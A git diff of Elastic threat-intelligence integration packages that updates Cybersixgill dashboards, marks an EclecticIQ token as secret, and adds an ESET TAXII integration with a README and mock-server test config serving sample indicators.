The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "", @@ -118,8 +137,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs AbuseCH]", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -190,8 +208,7 @@ }, "panelIndex": "73a752f9-bde5-4396-8ede-e9e77a37182d", "title": "Unique File Extensions [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -262,8 +279,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -362,8 +378,7 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -464,8 +479,7 @@ }, "panelIndex": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d", "title": "Percentage of URL Schema used [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -567,8 +581,7 @@ }, "panelIndex": "fda93ed1-72f0-4489-80b7-9e69d14f30aa", "title": "Most Popular File Extensions [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -669,8 +682,7 @@ }, "panelIndex": "08fe9c8a-d5d8-4c8f-ab42-b0cfb0390008", "title": "Mitre Tactics ID [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { 
@@ -771,20 +783,17 @@ }, "panelIndex": "a828d701-6a36-4401-8b35-419b4454c6fc", "title": "Mitre Tactics Name [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] URLs", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:46:26.520Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:01:08.837Z", "id": "ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -801,6 +810,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "73a752f9-bde5-4396-8ede-e9e77a37182d:indexpattern-datasource-current-indexpattern", @@ -875,7 +889,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json index 134f861b7eb..33001112266 100644 --- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json 
@@ -45,6 +45,25 @@ "data_stream.dataset": "ti_cybersixgill.threat" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { 
@@ -79,7 +98,7 @@ "description": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**[Cybersixgill Overview (This Page)](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738)** \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the Cybersixgill Darkfeed integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. ", + "markdown": "**Navigation**\n\n**[Cybersixgill Overview (This Page)](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738)** \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the Cybersixgill Darkfeed integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "Overview Textbox [Logs AbuseCH]", @@ -95,8 +114,7 @@ "y": 0 }, "panelIndex": "555e9e6c-04e9-4022-b6df-bda07dde30c4", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { 
@@ -242,8 +260,7 @@ }, "panelIndex": "e971fedd-6afd-4d03-93ac-d0c751acc254", "title": "Feed and Indicator Selector [Logs Cybersixgill]", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -318,8 +335,7 @@ }, "panelIndex": "d37eb797-f273-43c2-9004-b947891cce55", "title": "Total Indicators [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -439,8 +455,7 @@ }, "panelIndex": "86d83606-4176-44b1-b3f3-011d5b5b4b58", "title": "Total Indicators per Provider [Logs AbuseCH]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -541,8 +556,7 @@ }, "panelIndex": "f3141aca-8e35-48a7-9ac8-cc43fa1a47c0", "title": "Mitre Tactics [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -616,8 +630,7 @@ }, "panelIndex": "6509dcc9-bb9c-4c1f-80e9-612f67ada340", "title": "Total Datastreams [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -757,20 +770,17 @@ }, "panelIndex": "aab4fac0-d39c-4521-aa9b-0a49d5938e9e", "title": "Indicators ingested per Datastream [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:46:34.989Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:00:21.661Z", "id": "ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", 
@@ -782,6 +792,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "e971fedd-6afd-4d03-93ac-d0c751acc254:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", @@ -861,7 +876,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json index 54f4421a486..03b8557e40e 100644 --- a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json @@ -4,12 +4,11 @@ "description": "", "name": "Cybersixgill" }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:45:21.934Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T19:20:05.636Z", "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", - "migrationVersion": { - "tag": "8.0.0" - }, + "managed": true, "references": [], - "type": "tag" + "type": "tag", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json new file mode 100644 index 00000000000..2ea984f8795 --- /dev/null 
+++ b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json
@@ -0,0 +1,14 @@
+{
+ "attributes": {
+ "color": "#FEC514",
+ "description": "Tag defined in package-spec",
+ "name": "Security Solution"
+ },
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2024-03-15T19:20:05.690Z",
+ "id": "ti_cybersixgill-security-solution-default",
+ "managed": false,
+ "references": [],
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
+}
\ No newline at end of file
diff --git a/packages/ti_cybersixgill/manifest.yml b/packages/ti_cybersixgill/manifest.yml
index 0ad8dbfc718..89fd7352106 100644
--- a/packages/ti_cybersixgill/manifest.yml
+++ b/packages/ti_cybersixgill/manifest.yml
@@ -1,13 +1,13 @@
 name: ti_cybersixgill
 title: Cybersixgill
-version: "1.25.1"
+version: "1.27.0"
 description: Ingest threat intelligence indicators from Cybersixgill with Elastic Agent.
 type: integration
-format_version: "3.0.0"
+format_version: "3.0.2"
 categories: ["security", "threat_intel"]
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 policy_templates:
 - name: cybersixgill
 title: Cybersixgill Threat Intel
diff --git a/packages/ti_eclecticiq/changelog.yml b/packages/ti_eclecticiq/changelog.yml
index eb31a43b556..d440a40876a 100644
--- a/packages/ti_eclecticiq/changelog.yml
+++ b/packages/ti_eclecticiq/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.3.0"
+ changes:
+ - description: Set sensitive values as secret, upgrade to package spec 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9238
 - version: "0.2.0"
 changes:
 - description: Enable SSL configuration for requests
diff --git a/packages/ti_eclecticiq/manifest.yml b/packages/ti_eclecticiq/manifest.yml
index 61ca3e7083f..994a8baa49e 100644
--- a/packages/ti_eclecticiq/manifest.yml
+++ b/packages/ti_eclecticiq/manifest.yml
@@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: ti_eclecticiq title: EclecticIQ -version: 0.2.0 +version: 0.3.0 description: Ingest threat intelligence from EclecticIQ with Elastic Agent type: integration categories: @@ -9,7 +9,7 @@ categories: - threat_intel conditions: kibana: - version: ^8.8.2 + version: ^8.12.0 elastic: subscription: basic icons: @@ -33,10 +33,11 @@ policy_templates: show_user: true required: true - name: token - type: text + type: password title: API token show_user: true required: true + secret: true - name: ssl type: yaml title: SSL Configuration @@ -72,7 +73,6 @@ policy_templates: # xw23l/k8RoD1wRWaDVbgpjwSzt+kl+vJE/ip2w3h69eEZ9wbo6scRO5lCO2JM4Pr # 7RhLQyWn2u00L7/9Omw= # -----END CERTIFICATE----- - owner: github: elastic/security-service-integrations type: partner diff --git a/packages/ti_eset/LICENSE.txt b/packages/ti_eset/LICENSE.txt new file mode 100644 index 00000000000..809108b857f --- /dev/null +++ b/packages/ti_eset/LICENSE.txt 
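Review bot: Only `token` gains `type: password` / `secret: true` in the `@@ -33,10 +33,11 @@` hunk, while the `ssl` yaml variable directly below it stays a plain variable even though that is where a client key or key passphrase would be pasted (the commented example further down, ending in `-----END CERTIFICATE-----`, shows PEM material is expected inline). If package-spec 3.0.3 permits `secret` on a `yaml` variable, consider marking `ssl` the same way; if it does not, a one-line comment saying so would stop the next reader from treating the omission as an oversight. The Kibana condition bump to `^8.12.0` in the same file looks tied to the new `secret: true`, but nothing records that dependency; a comment such as `secret: true  # presumably requires the ^8.12.0 Kibana condition above — keep in sync` next to the flag would make the coupling explicit.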
@@ -0,0 +1,93 @@ +Elastic License 2.0 + +URL: https://www.elastic.co/licensing/elastic-license + +## Acceptance + +By using the software, you agree to all of the terms and conditions below. + +## Copyright License + +The licensor grants you a non-exclusive, royalty-free, worldwide, +non-sublicensable, non-transferable license to use, copy, distribute, make +available, and prepare derivative works of the software, in each case subject to +the limitations and conditions below. + +## Limitations + +You may not provide the software to third parties as a hosted or managed +service, where the service provides users with access to any substantial set of +the features or functionality of the software. + +You may not move, change, disable, or circumvent the license key functionality +in the software, and you may not remove or obscure any functionality in the +software that is protected by the license key. + +You may not alter, remove, or obscure any licensing, copyright, or other notices +of the licensor in the software. Any use of the licensor’s trademarks is subject +to applicable law. + +## Patents + +The licensor grants you a license, under any patent claims the licensor can +license, or becomes able to license, to make, have made, use, sell, offer for +sale, import and have imported the software, in each case subject to the +limitations and conditions in this license. This license does not cover any +patent claims that you cause to be infringed by modifications or additions to +the software. If you or your company make any written claim that the software +infringes or contributes to infringement of any patent, your patent license for +the software granted under these terms ends immediately. If your company makes +such a claim, your patent license ends immediately for work on behalf of your +company. + +## Notices + +You must ensure that anyone who gets a copy of any part of the software from you +also gets a copy of these terms. 
+ +If you modify the software, you must include in any modified copies of the +software prominent notices stating that you have modified the software. + +## No Other Rights + +These terms do not imply any licenses other than those expressly granted in +these terms. + +## Termination + +If you use the software in violation of these terms, such use is not licensed, +and your licenses will automatically terminate. If the licensor provides you +with a notice of your violation, and you cease all violation of this license no +later than 30 days after you receive that notice, your licenses will be +reinstated retroactively. However, if you violate these terms after such +reinstatement, any additional violation of these terms will cause your licenses +to terminate automatically and permanently. + +## No Liability + +*As far as the law allows, the software comes as is, without any warranty or +condition, and the licensor will not be liable to you for any damages arising +out of these terms or the use or nature of the software, under any kind of +legal claim.* + +## Definitions + +The **licensor** is the entity offering these terms, and the **software** is the +software the licensor makes available under these terms, including any portion +of it. + +**you** refers to the individual or entity agreeing to these terms. + +**your company** is any legal entity, sole proprietorship, or other kind of +organization that you work for, plus all organizations that have control over, +are under the control of, or are under common control with that +organization. **control** means ownership of substantially all the assets of an +entity, or the power to direct its management and policies by vote, contract, or +otherwise. Control can be direct or indirect. + +**your licenses** are all the licenses granted to you for the software under +these terms. + +**use** means anything you do with the software requiring one of your licenses. 
+ +**trademark** means trademarks, service marks, and similar rights. diff --git a/packages/ti_eset/_dev/build/build.yml b/packages/ti_eset/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/ti_eset/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/ti_eset/_dev/build/docs/README.md b/packages/ti_eset/_dev/build/docs/README.md new file mode 100644 index 00000000000..a9841015836 --- /dev/null +++ b/packages/ti_eset/_dev/build/docs/README.md 
@@ -0,0 +1,133 @@ +# ESET Threat Intelligence Integration + +This integration connects with the [ESET Threat Intelligence](https://eti.eset.com/taxii2/) TAXII version 2 server. +It includes the following datasets for retrieving logs: + +| Dataset | TAXII2 Collection name | +|--------:|:-----------------------| +| apt | apt stix 2.1 | +| botnet | botnet stix 2.1 | +| cc | botnet.cc stix 2.1 | +| domains | domain stix 2.1 | +| files | file stix 2.1 | +| ip | ip stix 2.1 | +| url | url stix 2.1 | + +## Expiration of Indicators of Compromise (IOCs) +The ingested IOCs expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for every source index to +facilitate only active IOCs be available to the end users. Each transform creates a destination index named `logs-ti_eset_latest.dest_*` which only contains active and unexpired IOCs. +Destinations indices are aliased to `logs-ti_eset_latest.`. + +| Source Datastream | Destination Index Pattern | Destination Alias | +|:-------------------------|:-----------------------------------|-----------------------------| +| `logs-ti_eset.apt-*` | logs-ti_eset_latest.dest_apt-* | logs-ti_eset_latest.apt | +| `logs-ti_eset.botnet-*` | logs-ti_eset_latest.dest_botnet-* | logs-ti_eset_latest.botnet | +| `logs-ti_eset.cc-*` | logs-ti_eset_latest.dest_cc-* | logs-ti_eset_latest.cc | +| `logs-ti_eset.domains-*` | logs-ti_eset_latest.dest_domains-* | logs-ti_eset_latest.domains | +| `logs-ti_eset.files-*` | logs-ti_eset_latest.dest_files-* | logs-ti_eset_latest.files | +| `logs-ti_eset.ip-*` | logs-ti_eset_latest.dest_ip-* | logs-ti_eset_latest.ip | +| `logs-ti_eset.url-*` | logs-ti_eset_latest.dest_url-* | logs-ti_eset_latest.url | + +### ILM Policy +ILM policy is added to the source indices, so it doesn't lead to unbounded growth. 
+Data in these source indices will be deleted after a certain number of days from ingested days: + +| Index | Deleted after | Expired after | +|-----------------------:|:--------------|---------------| +| `logs-ti_eset.apt` | 365d | 365d | +| `logs-ti_eset.botnet` | 7d | 48h | +| `logs-ti_eset.cc` | 7d | 48h | +| `logs-ti_eset.domains` | 7d | 48h | +| `logs-ti_eset.files` | 7d | 48h | +| `logs-ti_eset.ip` | 7d | 48h | +| `logs-ti_eset.url` | 7d | 48h | + +## Requirements + +Elastic Agent must be installed. +For more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, +and manage your agents in a central location. +We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, +you install Elastic Agent and manually configure the agent locally on the system where it’s installed. +You are responsible for managing and upgrading the agents. +This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. +Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, +and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. 
+ +## Setup + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations. +2. In "Search for integrations" search bar, type ESET Threat Intelligence. +3. Click on the "ESET Threat Intelligence" integration from the search results. +4. Click on the "Add ESET Threat Intelligence" button to add the integration. +5. Configure all required integration parameters, including username and password that you have received from ESET during onboarding process. For more information, please visit [ESET Threat Intelligence](https://www.eset.com/int/business/services/threat-intelligence/) page. +6. Enable data streams you are interested in and have access to. +7. Save the integration. + +## Logs + +### Botnet + +{{fields "botnet"}} + +{{event "botnet"}} + +### C&C + +{{fields "cc"}} + +{{event "cc"}} + +### Domains + +{{fields "domains"}} + +{{event "domains"}} + +### Malicious files + +{{fields "files"}} + +{{event "files"}} + +### IP + +{{fields "ip"}} + +{{event "ip"}} + +### APT + +{{fields "apt"}} + +{{event "apt"}} + +### URL + +{{fields "url"}} + +{{event "url"}} \ No newline at end of file diff --git a/packages/ti_eset/_dev/deploy/docker/docker-compose.yml b/packages/ti_eset/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..f6b5e406689 --- /dev/null +++ b/packages/ti_eset/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,14 @@ +version: "2.3" +services: + eti: + image: docker.elastic.co/observability/stream:v0.6.1 + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/ti_eset/_dev/deploy/docker/files/config.yml b/packages/ti_eset/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..13f8faf014d --- /dev/null +++ b/packages/ti_eset/_dev/deploy/docker/files/config.yml 
@@ -0,0 +1,1071 @@ +rules: + # Botnet + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2023-10-18T02:05:09.000Z" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2023-10-18T02:05:10.000Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--2c659a56-9317-4acb-8759-78490558a25d", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-18T02:05:09.000Z", + "modified": "2023-10-18T02:05:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C indicates that a botnet Win32/Rescoms.B backdoor is present.", + "pattern": "[url:value = 'https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-18T02:05:09Z", + "valid_until": "2023-10-20T02:05:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOFQwMDowNToxMy4xNDU2NTQrMDA6MDB8aW5kaWNhdG9yLS0yYzY1OWE1Ni05MzE3LTRhY2ItODc1OS03ODQ5MDU1OGEyNWQ=" + } + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2023-10-18T02:05:10.000Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2023-10-18T02:05:09.000Z" + Content-Type: 
"application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-18T02:05:09.000Z", + "modified": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "description": "Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-18T02:05:09Z", + "valid_until": "2023-10-20T02:05:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOFQwMDowNToxMy4xNDU2NTQrMDA6MDB8aW5kaWNhdG9yLS0yYzY1OWE1Ni05MzE3LTRhY2ItODc1OS03ODQ5MDU1OGEyNWQ=" + } + # C&C + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:09.000Z", + 
"modified": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C of Win32/Smokeloader.H trojan", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:09Z", + "valid_until": "2023-10-21T02:00:09Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--b02438ee-5a6d-467f-999b-f8bf2dd20b73", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:09.000Z", + "modified": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:09Z", + "valid_until": "2023-10-21T02:00:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowMDoxNC45OTg2MTQrMDA6MDB8aW5kaWNhdG9yLS1iMDI0MzhlZS01YTZkLTQ2N2YtOTk5Yi1mOGJmMmRkMjBiNzM=" + } + # Domains + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "type": 
"indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:28.000Z", + "modified": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "pattern": "[domain-name:value='example.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:28Z", + "valid_until": "2023-10-21T02:00:28Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--f4f0b76e-3532-47c6-8379-93ca3ed53ca8", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:28.000Z", + "modified": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "description": "Host actively distributes high-severity threat in the form of malicious code.", + "pattern": "[domain-name:value='example.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:28Z", + "valid_until": "2023-10-21T02:00:28Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowMToyMC43ODk0MjcrMDA6MDB8aW5kaWNhdG9yLS1mNGYwYjc2ZS0zNTMyLTQ3YzYtODM3OS05M2NhM2VkNTNjYTg=" + } + # Malicious files + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: 
